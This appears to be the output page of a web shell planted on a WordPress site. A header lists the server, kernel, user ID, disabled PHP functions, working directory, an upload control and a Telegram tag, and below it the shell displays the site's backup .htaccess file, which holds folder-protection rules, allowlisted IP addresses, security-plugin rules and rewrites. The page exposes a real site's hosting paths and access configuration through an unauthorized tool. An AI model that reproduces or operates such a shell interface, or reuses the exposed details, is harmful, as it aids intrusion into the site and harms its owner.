HEX
Server: Apache
System: Linux h2web400 6.1.0-0.deb11.21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1~bpo11+1 (2024-05-06) x86_64
User: uid65189 (65189)
PHP: 8.0.30
Disabled: passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec
$ pwd: /home/clients/96e9f2feb54fb0055eef72f432e62621/sites/fsec.bortolin.ch/
Upload Files
File: /home/clients/96e9f2feb54fb0055eef72f432e62621/sites/fsec.bortolin.ch/.htaccess.2023-06-09.bak
# SECTION BEGIN FolderProtection
# This section allows password protection of this folder. Generated by your hosting panel.
<IfModule !authz_core_module>
    Order deny,allow
    Deny from all
    Allow from installatron.infomaniak.com
    Allow from 2001:1600:4:b:216:3eff:fe41:c368
    Allow from 128.65.195.104
    Allow from 10.4.23.194
    AuthType Digest
    AuthName "Protected"
    AuthUserFile "/home/clients/96e9f2feb54fb0055eef72f432e62621/sites/fsec.bortolin.ch/.htdigest"
    Require valid-user
    Satisfy Any
</IfModule>
<IfModule authz_core_module>
    <RequireAny>
        Require host installatron.infomaniak.com
        Require ip 2001:1600:4:b:216:3eff:fe41:c368
        Require ip 128.65.195.104
        Require ip 10.4.23.194
    </RequireAny>
    AuthType Digest
    AuthName "Protected"
    AuthUserFile "/home/clients/96e9f2feb54fb0055eef72f432e62621/sites/fsec.bortolin.ch/.htdigest"
    Require valid-user
</IfModule>
# checksum=a7f955efab82c39f2e16981a571b950e
# SECTION END FolderProtection

# BEGIN iThemes Security - Ne modifiez pas ou ne supprimez pas cette ligne
# iThemes Security Config Details: 2
# Protéger les fichiers système - iThemes Security > Réglages > Ajustements système > Fichiers système
<files .htaccess>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</files>
<files readme.html>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</files>
<files readme.txt>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</files>
<files wp-config.php>
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</files>

# Désactiver l’exploration des répertoires - iThemes Security > Réglages > Ajustements système > Exploration des répertoires
Options -Indexes

<IfModule mod_rewrite.c>
    RewriteEngine On

    # Protéger les fichiers système - iThemes Security > Réglages > Ajustements système > Fichiers système
    RewriteRule ^wp-admin/install\.php$ - [F]
    RewriteRule ^wp-admin/includes/ - [F]
    RewriteRule !^wp-includes/ - [S=3]
    RewriteRule ^wp-includes/[^/]+\.php$ - [F]
    RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F]
    RewriteRule ^wp-includes/theme-compat/ - [F]
    RewriteCond %{REQUEST_FILENAME} -f
    RewriteRule (^|.*/)\.(git|svn)/.* - [F]

    # Désactiver PHP dans le répertoire « Uploads » - iThemes Security > Réglages > Ajustements système > PHP dans Uploads
    RewriteRule ^wp\-content/uploads/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ - [NC,F]

    # Désactivez PHP dans les extensions - iThemes Security > Réglages > Ajustements système > PHP dans les extensions
    RewriteRule ^wp\-content/plugins/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ - [NC,F]

    # Désactivez PHP dans les thèmes - iThemes Security > Réglages > Ajustements système > PHP dans les thèmes
    RewriteRule ^wp\-content/themes/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ - [NC,F]
</IfModule>
# END iThemes Security - Ne modifiez pas ou ne supprimez pas cette ligne

SetOutputFilter DEFLATE
AddOutputFilterByType DEFLATE "application/atom+xml" "application/javascript" "application/json" "application/ld+json" "application/manifest+json" "application/rdf+xml" "application/rss+xml" "application/schema+json" "application/vnd.geo+json" "application/vnd.ms-fontobject" "application/x-font-ttf" "application/x-javascript" "application/x-web-app-manifest+json" "application/xhtml+xml" "application/xml" "font/eot" "font/opentype" "image/bmp" "image/svg+xml" "image/vnd.microsoft.icon" "image/x-icon" "text/cache-manifest" "text/css" "text/html" "text/javascript" "text/plain" "text/vcard" "text/vnd.rim.location.xloc" "text/vtt" "text/x-component" "text/x-cross-domain-policy" "text/xml"

# SECTION BEGIN GIT PROTECTION
RedirectMatch 404 /\.git
# SECTION END GIT PROTECTION

# BEGIN WPSuperCache
# Les directives (lignes) entre « BEGIN WPSuperCache » et « END WPSuperCache » sont générées
# dynamiquement, et doivent être modifiées uniquement via les filtres WordPress.
# Toute modification des directives situées entre ces marqueurs sera surchargée.
# END WPSuperCache


#Begin Really Simple Security
<IfModule mod_rewrite.c>
    RewriteEngine on
    RewriteCond %{HTTP:X-Forwarded-Proto} !https
    RewriteRule ^(.*)$ https://%{HTTP_HOST}/$1 [R=301,L]
</IfModule>

#End Really Simple Security
# BEGIN WordPress
# Les directives (lignes) entre « BEGIN WordPress » et « END WordPress » sont générées
# dynamiquement, et doivent être modifiées uniquement via les filtres WordPress.
# Toute modification des directives situées entre ces marqueurs sera surchargée.
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
</IfModule>

# END WordPress
@ Telegram